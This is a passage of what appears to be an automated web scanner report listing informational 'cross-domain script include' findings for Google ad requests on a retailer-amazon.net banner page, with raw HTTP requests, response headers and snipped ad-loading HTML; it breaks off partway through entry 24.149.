Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=lkIA6MZjgdWNLb-ezcBaeR_R3Ys3RWmwKz7fP1nwguKkWeHPXDae0aU5zRDsg2DaUngWeeLXhaTZYK2uLANKOa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vGND4gyL4tJYU4x0ZDJlERs5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRO2gAMv4cK7GMUxys8ZZyWt7UCxBiTiBOAew&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBND4Z2k60TYf_MpTGsQfl-Ky5DMCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtwcQdRw2WoZD8G7XUPGVbZ5GL2fdg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.143. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679721&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661721573&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661721579&frm=1&adk=2614322350&ga_vid=1108700530.1303661722&ga_sid=1303661722&ga_hid=830227066&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=xlVLSeu1BUuJnSQwIvc_dqylfiPNl13aGcShyF5znv6QsyY6B_3DClLdxxpKZdGfOaqIO6otpN5tHEP5lF3I1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfpqw7-gXJrOTXQhp_NHN0hzH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMlgAJjdMK5TsNMMwkwsaawzpsWJ7Nc8s9gw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKdS2lky0TdObJo32lAfCybCGA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtyrryr04rkA9J_KR2KaKHqr9794Nw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.144. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:26:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.145. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680013&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662012988&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662013000&frm=1&adk=2614322350&ga_vid=596070482.1303662013&ga_sid=1303662013&ga_hid=561352512&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:20:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25673337&ahcid=840118&bimpd=_5slL4D9RadDzW8NPRhCpPLQK_k1lqZ3jhRE1s0T9UJvDwQ3gKAhbrJGz0Ybjgrm6Pu_JaLRIdHrSMEVdVucX69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BNTVfDaMWtGLJmN9PvDZhOlBYthQ5aCQ1mYSBEHRt8oSk9ydg04sOwARxmm8wMcfLZg0pkLSmXb9kMT6fUvaQOnTnt-vTTl1ccgclwVJEKA436waAnwiGEagegQWICZbOtsyyRQeXkTM-mPAHCYWjQchCho2vQFkPDNWqOr73J9btC8cnfVoc-ffY0bjr9ypPp0l40_4cIK_dVeFuq6yQtUFEGLiLwCfrF_l8MZMrUPZytEMFcbyi8Mz8uQjTAyhkgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7Iyw6uq0xJRP_FbHyt9ZNiNFVcTUxG7t3A6NzatYRd4Lm-a333a7UvwhV1lDapSbKjX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfoF1UrtUpipRKKz6A-3aAu-ni-SYlmeUF3Nm1iaLhF9kwA_xOrfycUFDp6u0zpJ64rt_T370WDWWY1SqEwEJwbh67avgm6Atn0OkHl8s2_rLjYvoIhw6vwnl4MOBUT5NT5A9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRNugABKe8K5X6IMLFNi31O5jN0gkiWmEgBvQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBe9piuk20Te_TBIj9lQeLm8WFA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAa34s3eoNuIjaAB%26num%3D1%26sig%3DAGiWqty87c8rwV_L7cUn5LDPmmQj3g85-Q%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.146. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676660&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658660953&bpp=9&shv=r20110420&jsv=r20110415&correlator=1303658660965&frm=1&adk=2614322350&ga_vid=1762053620.1303658661&ga_sid=1303658661&ga_hid=934351659&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2167

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25673337&ahcid=840118&bimpd=FcNIhmMMQSMcmqVTsclvplb9ewTMxOp25EblA9yiFVU6PkHztrWmyxWveVilkhwYE2daTDp8iFSmrzkfWbLrzq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BNTVfDaMWtGLJmN9PvDZhOlBYthQ5aCQ1mYSBEHRt8oSk9ydg04sOwARxmm8wMcfLZg0pkLSmXb9kMT6fUvaQOnTnt-vTTl1ccgclwVJEKA436waAnwiGEagegQWICZbOtsyyRQeXkTM-mPAHCYWjQchCho2vQFkPDNWqOr73J9bPQ132Ppbuk7ijoUndfzz7p0l40_4cIK_dVeFuq6yQtUQtPUcUlC_s56T2e_ZUTBrjxudTmqB9Q8IbbO-zxdWHQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7Iyw6uq0xJRP_FbHyt9ZNiNFVcTUxG7t3A6NzatYRd4Lm-a333a7UvwhV1lDapSbKjX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3g7JGonBv1VxN8EXFLlC0Nvni-SYlmeUF3Nm1iaLhF9kwA_xOrfycUFDp6u0zpJ64rt_T370WDWWY1SqEwEJwbh67avgm6Atn0OkHl8s2_rLjYvoIhw6vwnl4MOBUT5NT5A9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAoQAPHAsK5XcLGnBy3IYhoriiJ7Sfhk6PGQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYf8KoUC0TYu4PIvulQfc5cHTAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGt-LN3qDbiI2gAQ%26num%3D1%26sig%3DAGiWqtyr5_AzCD8u95t2bTaXLoZX0saauA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.147. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676627&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658627053&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658627058&frm=1&adk=2614322350&ga_vid=1146255573.1303658627&ga_sid=1303658627&ga_hid=479562903&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15194

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110414/r20110415/measurements.js"></script>
...[SNIP]...

24.148. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381013&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658381040&frm=1&adk=2614322350&ga_vid=1758512325.1303658381&ga_sid=1303658381&ga_hid=1384201995&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=32 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-yE2WDiJ9T_7ITZYOIn1PwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1P5sh1rsNl6JOSsYda6b2ziWKP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAvA8BAgUCAAQAAAAAtyGL3QAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658399%29%3Buf%28%27c%27%2C+52368%2C+1303658399%29%3Buf%28%27r%27%2C+173254%2C+1303658399%29%3Bppv%288991%2C+%275666257366427247003%27%2C+1303658399%2C+1303701599%2C+52368%2C+25553%29%3B&cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQ_igAAupwK5YMKNx5dnk5UwXzUk6H7LYr_pw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6NSjij-0TZz1AoqGlgeeu_m4A9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzghi4ziRoyAyYDhZkLYBiHzlX2Ow%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.149. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

